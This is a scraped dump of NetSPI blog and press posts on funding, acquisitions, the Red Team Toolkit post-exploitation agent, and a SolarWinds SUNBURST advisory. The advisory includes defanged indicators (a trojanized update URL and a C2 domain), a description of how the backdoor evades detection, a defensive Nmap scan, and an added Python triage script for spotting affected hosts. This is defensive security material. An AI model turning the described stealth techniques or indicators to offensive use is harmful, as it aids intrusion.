NetSPI’s Dark Side Ops trainings, DSO 1: Malware Dev, DSO 2: Adversary Simulation, and DSO 3: Azure Cloud Pentesting are available as private trainings, upon request. Contact NetSPI for more information regarding private group training sessions.
For additional training details and course requirements, visit the NetSPI website. Registration is now open for all August 2021 DSO cybersecurity training courses.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
Investment to Fuel Innovation and Growth, Including Global Expansion and Product Innovation
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced it has raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. The investment will be used to further accelerate NetSPI’s rapid growth by expanding the company’s cyber security and client experience teams, investing in product innovation, and deepening operations across U.S. and international markets.
“The reality is that cyber security attacks today are inevitable and put organizations at grave risk,” said NetSPI President and Chief Executive Officer Aaron Shilts. “At NetSPI, we strive to stay one step ahead of hackers, breaches, and bad actors by focusing on prevention-based security techniques. Rooted in the founding tenets of the company, our goals are purposely aggressive to help our clients adapt to the constantly evolving threat landscape.”
Since its founding, NetSPI has focused its services to help companies proactively defend themselves from cyberattacks through a robust and innovative technology platform, allowing NetSPI’s team of experts to thoroughly identify security vulnerabilities. At a time when cyber security spending is expected to exceed $200 billion per year by 2024, according to a recent Bloomberg Intelligence (BI) report, more companies are preparing to fend off sophisticated cyber-attacks and avoid reputational and business risks.
“Our clients rely on us to help secure their ever-evolving attack surface by leveraging our expertise in cloud, red team, application, and network security,” continued Shilts. “This investment from KKR and Ten Eleven Ventures allows NetSPI to better meet this demand while simultaneously fueling growth and innovation as a leader in the booming cyber security market. With our investors’ support, NetSPI will continue to transform the industry with a focus on attack surface management, enterprise security testing, and vulnerability management.”
“NetSPI has built a differentiated suite of tech-enabled services and test orchestration and reporting software that is not only enhancing cyber security for complex global enterprises across a wide range of industries, but is simultaneously disrupting the traditional penetration testing market in order for these enterprises to continuously test their applications, networks, and cloud infrastructures at scale,” said Ben Pederson, Principal at KKR. “We are excited to invest in NetSPI’s growth as they build and deliver these critically important offensive security solutions.”
Jake Heller, Head of KKR’s Technology Growth team in the Americas, added: “Aaron and his team have a deep appreciation for the needs of their customers and the increasing demand for best-in-class, tech-enabled cyber security systems.”
KKR is investing in NetSPI through its Next Generation Technology Growth Fund II. KKR and Ten Eleven Ventures have invested in market-leading cyber security companies including Darktrace, KnowBe4, Ping Identity, Cylance, ForgeRock, and ReliaQuest.
“Penetration testing is a critical component of any enterprise’s security program and will continue to be an important part of compliance and regulatory requirements in the future,” said Mark Hatfield, General Partner, Ten Eleven Ventures. “With its deep expertise and automated platform, NetSPI has developed an incredibly effective and efficient approach to penetration testing and attack surface management. We’re thrilled to partner with this exceptional team and look forward to drawing on our cyber security expertise to help NetSPI bring its technology to more companies across the globe.”
After spending its first several years as a bootstrapped, profitable business, in 2017 NetSPI partnered with Sunstone Partners, who has been instrumental to the company’s growth post-investment. Gus Alberelli, Managing Director of Sunstone Partners, said: “We’re incredibly fortunate to partner with NetSPI’s team and proud of the company’s extraordinary growth stemming from its technology-enabled penetration testing team. We are excited for KKR and Ten Eleven Ventures to join Sunstone Partners in supporting NetSPI’s growth journey.”
The investment is the latest transaction in a period of accelerated growth for NetSPI. Most recently, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. In 2020, NetSPI launched Penetration Testing as a Service (PTaaS) powered by its Resolve™ platform. Upcoming additions of risk scoring, vulnerability intelligence, breach and attack simulation, and more will continue to differentiate NetSPI's technology offerings.
Goodwin Procter LLP advised NetSPI on the transaction and Latham & Watkins LLP advised KKR and Ten Eleven Ventures.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Tool Kit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About KKR
KKR is a leading global investment firm that offers alternative asset management and capital markets and insurance solutions. KKR aims to generate attractive investment returns by following a patient and disciplined investment approach, employing world-class people, and supporting growth in its portfolio companies and communities. KKR sponsors investment funds that invest in private equity, credit and real assets and has strategic partners that manage hedge funds. KKR’s insurance subsidiaries offer retirement, life, and reinsurance products under the management of The Global Atlantic Financial Group. References to KKR’s investments may include the activities of its sponsored funds and insurance subsidiaries. For additional information about KKR & Co. Inc. (NYSE: KKR), please visit KKR’s website at www.kkr.com and on Twitter @KKR_Co.
About Ten Eleven Ventures
Ten Eleven Ventures is the original venture capital firm focused solely on investing in digital security. The firm invests globally and at all stages, from seed to growth (the latter via its Joint Investment Alliance with KKR). Since its founding in Silicon Valley in 2015, Ten Eleven Ventures has raised nearly US$500 million and invested in 30 leading cybersecurity companies including KnowBe4, Darktrace, Twistlock, Verodin, Cylance, and Ping Identity. For more information, please visit www.1011vc.com or follow us on Twitter @1011vc.
About Sunstone Partners
Sunstone Partners is a growth-oriented private equity firm that makes majority and minority investments in technology-enabled services and software businesses. Recently recognized as one of Inc.’s 2020 PE 50 founder-friendly private equity firms for entrepreneurs, the firm seeks to partner with exceptional management teams, often as their first institutional capital partner, to help accelerate organic growth and fund acquisitions. Founded in 2015, the firm has $800 million of committed capital to its first two funds. For more information, visit www.sunstonepartners.com.
Media Contacts: Jean Hill, Maccabee PR for NetSPI, jean@maccabee.com, (612) 294-3154
KKR: Cara Major or Miles Radcliffe-Trenner, Media@KKR.com, (212) 750-8300
On May 12, 2021, NetSPI announced new funding from KKR and Ten Eleven. Learn why Ten Eleven chose to invest in NetSPI:
Today we’re pleased to announce our investment in NetSPI. In cybersecurity, understanding where weaknesses lie is a critical first step in defense. One crucial way to assess this is through penetration testing, where “ethical hackers” attempt to break into your systems before attackers can. Penetration testing is often required of technology vendors by their customers and a mandated part of certain required compliance programs and certifications, including SOC 2. Because of its importance, pen testing represents a $1.7Bn market growing at 22% a year – but companies are always looking for a way to do it in a faster and easier manner.
[post_title] => Ten Eleven: Why We Invested in NetSPI
[post_excerpt] => On May 12, 2021, NetSPI announced new funding from KKR and Ten Eleven. Learn why Ten Eleven chose to invest in NetSPI.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => ten-eleven-why-we-invested-in-netspi
[to_ping] =>
[pinged] =>
[post_modified] => 2022-12-16 10:50:52
[post_modified_gmt] => 2022-12-16 16:50:52
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=25347
[menu_order] => 281
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[70] => WP_Post Object
(
[ID] => 23017
[post_author] => 91
[post_date] => 2021-02-09 07:00:16
[post_date_gmt] => 2021-02-09 07:00:16
[post_content] =>
NetSPI’s toolkit for covert adversary simulations is now available to enterprise red teams with new features and functionality.
Minneapolis, Minnesota – NetSPI, the leader in enterprise penetration testing and attack surface management, today relaunched Red Team Toolkit, a sophisticated suite of penetration testing and adversary simulation tools. NetSPI integrated and advanced the Toolkit after the acquisition of Silent Break Security in late 2020. It features a re-designed web-based user experience and improved functionality that supports more advanced and collaborative red team operations.
“We designed the all-new Red Team Toolkit Platform to better emulate sophisticated, real-world attackers after observing critical gaps left by other well-signatured tools on the market,” said Brady Bloxham, Chief Technology Officer at NetSPI. “We continue to use the platform on our own red team operations and are constantly updating it with the latest offensive techniques and defensive countermeasures. It is the most capable offensive toolkit available to red teams today.”
Red Team Toolkit’s tooling and features include:
Slingshot: Slingshot is a Windows post-exploitation agent used by red teams to conduct advanced network cyber-operations. Designed with stealth in mind, it enables operators to accurately emulate sophisticated adversaries. It increases the speed and efficiency of advanced operations through malleable network profiles, direct syscall execution, memory obfuscation, blended HTML traffic, scripting automation interface, and more.
Improved user experience: Its new web-based user interface was built with the operator experience and productivity top of mind. It is a command and control (C2) server, providing a unified interface for all current and future tools.
Multi-user support: The all-new Red Team Toolkit Platform supports multi-user interaction with tiered access permissions. This provides mirrored output, improved team collaboration, seamless operations, and training opportunities.
Keyboard-centric controls: Inspired by a traditional terminal, red teamers will feel at home with keyboard-centric controls and an integrated command palette.
Functional storage: Connect Red Team Toolkit to your existing database infrastructure or a simple SQLite file. Everything is well-formed, easily parsed, and recorded in one central location.
“Our teams think like adversaries and perform red teaming for some of the most advanced organizations in the world,” said Aaron Shilts, President and CEO of NetSPI. “We take pride in building technology that changes how our clients think about their penetration testing programs and the industry as a whole – and we are thrilled to make it available to others with the reintroduction of Red Team Toolkit.”
Learn more about how Red Team Toolkit can optimize your Red Team engagements and increase productivity. Contact sales@netspi.com.
NetSPI is the leader in enterprise penetration testing and attack surface management. We are proud to partner with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Relaunches Red Team Toolkit
[post_excerpt] => NetSPI’s toolkit for covert adversary simulations is now available to enterprise red teams with new features and functionality.
[post_name] => netspi-relaunches-red-team-toolkit
[post_modified] => 2022-12-16 10:51:00
[post_modified_gmt] => 2022-12-16 16:51:00
[guid] => https://www.netspi.com/?post_type=news&p=21247
)
[71] => WP_Post Object
(
[ID] => 23016
[post_author] => 91
[post_date] => 2021-01-26 07:00:06
[post_date_gmt] => 2021-01-26 07:00:06
[post_content] =>
Following a successful year, NetSPI promotes Aaron Shilts to CEO while co-founder Deke George assumes a new role on the Board of Directors.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, achieved 35% organic revenue growth in fiscal year 2020, added over 150 new clients, and expanded its team to more than 200 employees. NetSPI’s Penetration Testing as a Service (PTaaS) delivery model, core service expansion, and Silent Break Security acquisition all contributed to its strong growth. Since 2017, NetSPI has tripled its topline revenue while remaining profitable.
As NetSPI looks forward to 2021, the company has promoted Aaron Shilts to President and CEO and Charles Horton to COO. NetSPI co-founder Deke George will assume a new role as Chairman on the Board of Directors and remain actively involved in the company.
“2020 was full of challenges, not only for our team, but also for our clients. I’m proud of the rapid growth this team has achieved and how we’ve adapted and scaled to support our clients at a time when people and organizations are more vulnerable,” said Shilts. “More businesses recognize the foundational importance of secure software. As such, I anticipate that NetSPI’s core business in application security, vulnerability management, and cloud testing will experience even higher demand in 2021.”
Achievements that contributed to NetSPI’s 2020 success include:
Penetration Testing as a Service (PTaaS) Powered by Resolve™: PTaaS enables customers to simplify the scoping of new engagements, view their testing results in real-time, orchestrate faster remediation, perform always-on continuous testing, and more – all through the Resolve vulnerability management and orchestration platform.
Cloud Security Testing Expansion: NetSPI expanded its industry-leading cloud penetration testing services to include the AWS, Azure, Google, and Oracle cloud environments, for both point-in-time and continuous testing.
Strategic Advisory Services: This new consulting service builds and improves application security programs. The core functions of Strategic Advisory Services include program benchmarking, roadmap development, and security metrics.
Static Application Security Testing (SAST) and Secure Code Review (SCR): NetSPI enhanced its SAST and SCR services to help development teams establish a more strategic approach to building secure applications and identifying vulnerabilities earlier in the software development lifecycle (SDLC).
Silent Break Security Acquisition: NetSPI acquired Silent Break Security to complete its offensive cybersecurity and attack surface management offerings. Silent Break Security’s manual testing team, proprietary Adversary Simulation and Red Team Toolkit software, and enterprise clients improve NetSPI’s ability to scale up vulnerability management programs to meet client needs.
NetSPI Thought Leadership: In 2020, NetSPI spotlighted its roster of technology and management experts, creating a breadth of thought leadership content across several platforms including the executive and technical blogs, webinars, downloadable resources, and the Agent of Influence podcast.
Philanthropic Activities: NetSPI became a sponsor for Change Starts With Me, a grassroots movement working to rebuild communities impacted by social, health, and economic crises. The company also continues to work closely with the University of Minnesota Masonic Children’s Hospital and raised funds to support World Central Kitchen, MasksOn.org, and Northside Funders Group.
“Technology innovation is what we do best. It’s the foundation on which we built NetSPI,” said Deke George. “This was evident over the past 12 months, and I believe NetSPI is leading a revolutionary shift in the way penetration testing and vulnerability management is performed.”
“We come into the new year with incredible momentum and continued focus on delivering an exceptional client experience,” Shilts said. “In 2021 we will extend the intelligence and automation features of our Resolve platform. With data from over 80 million vulnerabilities, we give our customers access to the most robust risk scoring system on the market, the power to predict the likelihood of vulnerabilities in their environment, and the ability to automatically run adversary simulations across their entire attack surface.”
Join NetSPI’s mailing list to be the first to receive company, product, and services updates. Sign up here.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on Facebook, Twitter, and LinkedIn.
Media Contacts:
Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277
[post_title] => NetSPI Celebrates 35% Organic Revenue Growth in 2020
[post_excerpt] => Following a successful year, NetSPI promotes Aaron Shilts to CEO while co-founder Deke George assumes a new role on the Board of Directors.
[post_name] => celebrates-35-percent-organic-revenue-growth-in-2020
[post_modified] => 2022-12-16 10:51:02
[post_modified_gmt] => 2022-12-16 16:51:02
[guid] => https://www.netspi.com/?post_type=news&p=21134
)
[72] => WP_Post Object
(
[ID] => 20716
[post_author] => 91
[post_date] => 2020-12-15 09:41:57
[post_date_gmt] => 2020-12-15 09:41:57
[post_content] =>
As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week. We know now the breaches have been linked back to a supply chain attack on the SolarWinds Orion Platform, a software platform that manages IT operations and products for over 300,000 organizations, including over 425 of the Fortune 500, all ten of the top U.S. telecommunications companies, all five branches of the U.S. Military, all five of the top U.S. accounting firms, and many, many more.
While FireEye, the U.S. Treasury, and National Telecommunications and Information Administration (NTIA) were the first to report a security breach, the breadth of SolarWinds’ customer base is an indicator that the breaches are seemingly the tip of the iceberg.
For the sake of information sharing, here is an overview of the attacks, immediate steps you can take to identify whether you have fallen victim, and tips for protecting your organization as communicated by FireEye, SolarWinds, and NetSPI. For the full technical deep-dive, we highly recommend the FireEye blog post.
On December 13, SolarWinds issued a security advisory alerting to a manual supply chain attack on its Orion Platform software builds for versions 2019.4 HF 5 through 2020.2.1, released between March 2020 and June 2020.
FireEye discovered the attack and suggests it is a state-sponsored global intrusion campaign by a group named UNC2452 - though many industry experts are attributing the attack to APT29, a group of hackers associated with the Russian Foreign Intelligence Service.
Attack Origin: UNC2452 gained access to victims via trojanized updates to SolarWinds’ Orion IT monitoring and management software, distributing malware called SUNBURST. Multiple trojanized updates were digitally signed and subsequently deployed via this URL: hxxps://downloads.solarwinds[.]com/solarwinds/CatalogResources/Core/2019.4/2019.4.5220.20574/SolarWinds-Core-v2019.4.5220-Hotfix5.msp. The downloaded file is a standard Windows Installer Patch file, which includes the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component.
How It Works: The digitally signed SolarWinds.Orion.Core.BusinessLayer.dll file is a component of the Orion Improvement Program (OIP) software framework that contains a backdoor that communicates with third-party servers via the HTTP protocol. The malicious DLL gets loaded into the legitimate SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe executables and can run dormant for up to two weeks before beaconing to a subdomain of avsvmcloud[.]com. To avoid possible detection, the C2 traffic between the beaconing server and the victim is made to resemble legitimate SolarWinds communications. This includes HTTP GET, HEAD, POST and PUT requests with JSON payloads in their bodies. The HTTP responses from the C2 server communicating with the victim contain XML data that resembles .NET assembly data used for normal SolarWinds operations. Within the XML, however, is obfuscated command information that is deobfuscated and then executed by the SolarWinds process on the victim’s system.
Impact/Result: Following the initial compromise and deployment of SUNBURST, a variety of more capable payloads can be deployed to facilitate lateral movement and data theft. Common payloads include TEARDROP and Cobalt Strike BEACON, both of which can be loaded into memory to improve stealth of operations.
Known breaches include:
FireEye: On December 8, FireEye communicated a state-sponsored security breach through which the attackers accessed FireEye’s Red Team assessment tools used to test customers’ security. Following the breach, the company made its list of countermeasures public. FireEye has now confirmed that this attack was a result of the SolarWinds Orion supply chain attack.
U.S. Treasury and the National Telecommunications and Information Administration (NTIA): On December 13, Reuters reported that Russian-associated hackers broke into the U.S. Treasury and Commerce department’s Microsoft 365 software and have been monitoring internal email traffic. Following a National Security Council meeting at the White House over the weekend, the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive for all federal agencies to power down SolarWinds Orion.
Organizations are frantically working to figure out if they have been a victim of the attack and how to protect themselves. Here are the immediate steps to take, according to SolarWinds, FireEye, and NetSPI’s team of offensive security experts:
First, determine if SolarWinds Orion is deployed within your environment. If unsure, NetSPI recommends performing a network scan to identify the Orion agent. For example, this can be performed with Nmap by running: nmap --open -sT -p 17778,17790 x.x.x.x/xx, where x.x.x.x is the network address and xx is the CIDR prefix length. If the Orion agent is found, follow SolarWinds’ recommendations.
SolarWinds recommends customers upgrade to Orion Platform version 2020.2.1 HF 1 as soon as possible. It also asks customers with any of the products listed on the security advisory for Orion Platform v2019.4 HF 5 to update to 2019.4 HF 6. Additional suggestions can be found in the security advisory. While upgrading Orion will prevent future backdoored deployments from occurring, it will not remediate the potentially infected deployments that have already taken place via the Orion Platform.
Additionally, FireEye provides a list of recommendations including its signatures to detect this threat actor and supply chain attack. Specific details on the YARA, Snort, and ClamAV signatures can be found on FireEye’s public GitHub page.
Get in Touch: To connect with NetSPI for support with testing efforts related to the SolarWinds Orion attack, email info@NetSPI.com.
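The two triage steps above, finding Orion hosts with the recommended Nmap scan and then comparing the installed version against the affected and fixed builds named in the advisory, as an added Python example; this is not code from NetSPI, SolarWinds or FireEye. The Nmap greppable output and version strings are constructed samples, and treating any hotfix at or above the named fix level as remediated is an assumption, not something the advisory states.

```python
"""
Added example (not from the post): triage helpers for the SolarWinds Orion
supply chain advisory.
  1. classify_orion_version(): compare an Orion Platform version string with
     the affected build range (2019.4 HF 5 through 2020.2.1) and the fixed
     builds (2019.4 HF 6, 2020.2.1 HF 1) named in the post.
  2. orion_hosts_from_nmap_greppable(): read the output of
     nmap --open -sT -p 17778,17790 <net>/<prefix> -oG - and list the hosts
     where an Orion agent port is open, so they can be checked by hand.
All sample data below is constructed for illustration.
"""
import re

# Ports the post names for the Orion agent.
ORION_PORTS = {17778, 17790}


def parse_orion_version(text):
    """Parse 'YYYY.N[.P] [HF k]' into a comparable (year, minor, patch, hotfix)
    tuple; return None if the string is not a recognisable Orion version."""
    m = re.fullmatch(r"\s*(\d{4})\.(\d+)(?:\.(\d+))?\s*(?:HF\s*(\d+))?\s*", text, re.I)
    if not m:
        return None
    year, minor, patch, hf = m.groups()
    return (int(year), int(minor), int(patch or 0), int(hf or 0))


# Range quoted in the advisory: 2019.4 HF 5 through 2020.2.1 (inclusive).
AFFECTED_LOW = parse_orion_version("2019.4 HF 5")
AFFECTED_HIGH = parse_orion_version("2020.2.1")


def classify_orion_version(text):
    """Return 'affected', 'remediated', 'outside_advisory_range' or 'unknown'.

    Assumption (not stated by the advisory): any hotfix at or above the named
    fix level for a branch (2019.4 HF 6, 2020.2.1 HF 1) counts as remediated.
    """
    v = parse_orion_version(text)
    if v is None:
        return "unknown"
    year, minor, patch, hf = v
    if (year, minor) == (2019, 4) and hf >= 6:
        return "remediated"
    if (year, minor) == (2020, 2) and (patch, hf) >= (1, 1):
        return "remediated"
    if AFFECTED_LOW <= v <= AFFECTED_HIGH:
        return "affected"
    return "outside_advisory_range"


def orion_hosts_from_nmap_greppable(output):
    """Map each host IP to the sorted list of Orion agent ports found open.

    Greppable (-oG) lines look like:
      Host: <ip> (<name>)<TAB>Ports: <port>/<state>/<proto>//<svc>///, ...
    Only TCP ports in state 'open' are counted; an open port marks a candidate
    host whose Orion version must still be confirmed by hand.
    """
    found = {}
    for line in output.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        open_ports = set()
        for entry in ports_field.split(","):
            parts = entry.strip().split("/")
            if len(parts) >= 3 and parts[1] == "open" and parts[2] == "tcp":
                open_ports.add(int(parts[0]))
        hits = sorted(open_ports & ORION_PORTS)
        if hits:
            found[ip] = hits
    return found


# Constructed sample of greppable output from the scan the post recommends.
SAMPLE_NMAP_OUTPUT = (
    "# Nmap scan initiated (constructed sample) as: nmap --open -sT -p 17778,17790 -oG - 10.0.0.0/28\n"
    "Host: 10.0.0.5 ()\tStatus: Up\n"
    "Host: 10.0.0.5 ()\tPorts: 17778/open/tcp//unknown///, 17790/open/tcp//unknown///\tIgnored State: closed (0)\n"
    "Host: 10.0.0.9 ()\tStatus: Up\n"
    "Host: 10.0.0.9 ()\tPorts: 17778/filtered/tcp//unknown///, 17790/open/tcp//unknown///\n"
    "Host: 10.0.0.12 ()\tPorts: 443/open/tcp//https///\tIgnored State: closed (997)\n"
    "# Nmap done -- 16 IP addresses (3 hosts up) scanned\n"
)

if __name__ == "__main__":
    # Constructed inventory: version strings an admin might read off each host.
    inventory = {"10.0.0.5": "2020.2 HF 1", "10.0.0.9": "2019.4 HF 6"}
    for ip, ports in orion_hosts_from_nmap_greppable(SAMPLE_NMAP_OUTPUT).items():
        version = inventory.get(ip, "not recorded")
        print(f"{ip}: Orion ports {ports}; version {version!r} -> "
              f"{classify_orion_version(version)}")
```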
[post_title] => FireEye, SolarWinds, U.S. Treasury: What’s Happening in the Cyber Security World Right Now?
[post_excerpt] => As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week
[post_name] => fireeye-solarwinds-us-treasury-whats-happening-in-the-cyber-security-world-right-now
[post_modified] => 2021-05-04 17:03:39
[post_modified_gmt] => 2021-05-04 17:03:39
[guid] => https://www.netspi.com/?p=20716
)
[73] => WP_Post Object
(
[ID] => 20550
[post_author] => 91
[post_date] => 2020-12-02 07:00:59
[post_date_gmt] => 2020-12-02 07:00:59
[post_content] =>
With the acquisition of Silent Break Security, NetSPI will expand and enhance adversary simulation software and services.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, today announced its acquisition of Silent Break Security, a Utah-based security testing firm which specializes in network and application testing, red teaming, and adversary simulation. Through this acquisition, NetSPI will broaden its footprint to create a complete package for offensive cyber security and attack surface management. With the integration of Silent Break Security’s manual testing team, along with their proprietary software platforms and toolsets, NetSPI will improve its ability to scale up vulnerability management programs to meet client needs.
“It’s our vision to secure the world’s attack surfaces with brilliant people and disruptive technology. The Silent Break Security team is the perfect complement to our strong culture and its software stack a natural fit for helping us drive innovation and leverage technology as a force multiplier,” said Aaron Shilts, President and COO of NetSPI. “I am very excited about the opportunity this presents our team. By leveraging the skills that Brady built in his Silent Break Security team, I believe NetSPI has an opportunity to disrupt the penetration testing industry.”
“It is rare to find two organizations that align so closely from a mission, vision, values, and culture perspective,” added Brady Bloxham, Founder and CEO of Silent Break Security. “Both organizations have cultures of high performance, innovation, and agility. Individually, NetSPI and Silent Break have been working toward many of the same goals and, now together, we will become a much greater force to be reckoned with.”
The combined NetSPI and Silent Break team will provide a complete package for offensive security through the following core strategies:
Industry Leading Talent: NetSPI’s expert penetration testers conduct over 150,000 hours of testing each year and deliver technical and thought leadership content to the industry. The addition of Silent Break Security’s team, many with U.S. Department of Defense (DoD) experience, will position the combined company as the industry’s strongest penetration testing provider.
Technology Innovation: At the foundation of the acquisition is innovation through proprietary technology. Acquiring Silent Break Security and its technology – adversary simulation software (Silent Break Central), Red Team Toolkit, among other tools – with the goal of integrating these into NetSPI’s Resolve™ vulnerability management and orchestration software, will enable the company to consistently find vulnerabilities that others miss, accelerate remediation, provide always-on continuous testing, and simplify the entire testing process.
Focus on Training: The commitment to quality is evident in each organization’s emphasis on continuous professional development and training programs for employees and client security teams. Silent Break Security will bring its in-depth training programs on malware development, adversary simulations, and offensive machine learning to NetSPI employees and clients to complement NetSPI’s acclaimed NetSPI University employee training program.
Penetration Testing as a Service (PTaaS): The acquired technologies and expertise will allow NetSPI to optimize its core penetration testing service: PTaaS. Automated scanning, real-time reporting, and streamlined remediation processes offered through PTaaS will give the manual testing team more time to focus on the difficult, hard-to-find vulnerabilities that only humans can find. Silent Break’s software fits perfectly into our strategy to deliver always-on attack surface management, giving Resolve customers the ability to run internal automated red team “plays” throughout the year.
Brady Bloxham, Founder and CEO of Silent Break Security will become NetSPI’s Chief Technology Officer (CTO). Silent Break Security operations and team members will remain in Lehi, Utah and throughout the U.S.
To learn more about the acquisition of Silent Break Security, connect with the NetSPI team by contacting Heather Rubash (heather.rubash@netspi.com; (612) 385-3006). Keep up to date with NetSPI’s latest news: visit netspi.com.
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with eight of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on Facebook, Twitter, and LinkedIn.
Media Contacts:
Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154
Florindo Gallicchio and Robert Richardson bring a combined 50 years of cyber security experience to NetSPI.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, today announced Florindo Gallicchio has joined as Managing Director and Robert Richardson has been promoted to Vice President of Customer Success. Expanding the leadership team is a principal component of NetSPI’s strategy to drive customer growth, program success, and return on investment (ROI) of penetration testing.
“Finding vulnerabilities that other pentesters miss, making reporting easier to digest and act upon, and streamlining our customer engagements through the Resolve™ vulnerability management platform are key areas of focus for our team,” said Aaron Shilts, President at NetSPI. “The growth of our leadership team gives us the opportunity to evolve and expand our services, providing customers peace-of-mind that they’re working with the best security testing and vulnerability management team on the market today.”
Cumulatively, Gallicchio and Richardson bring half a century of cyber security excellence to NetSPI, where they will help customers align security strategies to business goals.
Gallicchio is a senior risk management and information security practitioner with over 30 years of experience in building and running cyber security programs to securely manage the business while also achieving and maintaining compliance to regulatory and industry requirements. As Managing Director at NetSPI, he will be a strategic advisor to executives, boards of directors, and technology staff, helping them understand the role of security as a business strategy. Prior to joining NetSPI, Gallicchio was the CISO at a global advisory investment firm in New York City. He began his career with the National Security Agency (NSA) while serving in the U.S. Navy, where in 10 years of service he worked in signals and communications intelligence collection and systems exploitation.
Richardson has more than 20 years of experience as a builder of people, processes, and sales enablement that support and drive sales growth. Richardson is being promoted to Vice President of Customer Success at NetSPI, and will focus on people leadership, personnel development, and operational efficiency. Prior to NetSPI, Richardson built a professional services process and delivery capability that resulted in 150% growth over two years as Director of Strategic Staffing and the Program Management Office (PMO) at Optiv Security. Prior to the merger that formed Optiv, Richardson managed projects at FishNet Security.
“Gallicchio and Richardson bring new perspectives to the table,” added Deke George, Founder and CEO of NetSPI. “Notably, Gallicchio’s experience on the client side as a financial services CISO and his time serving in the U.S. Navy coupled with Richardson’s personnel development track record and ability to scale operations will allow NetSPI to further improve our customers’ vulnerability management programs. Having two of the industry’s best minds on our roster is a crucial part of our mission to provide invaluable pentesting services and counsel to our clients – and continue to stay one step ahead of adversaries.”
To learn more about NetSPI’s efforts to drive customer success, visit the company website to hear first-hand customer success stories or connect with the NetSPI team at info@netspi.com or call: (612) 465-8880.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Media Contact:
Tori Norris, Maccabee PR for NetSPI
tori@maccabee.com
612-294-3100
[post_title] => NetSPI Adds to Leadership Team to Support Continued Focus on Customer Success
[post_excerpt] => Florindo Gallicchio and Robert Richardson bring a combined 50 years of cyber security experience to NetSPI.
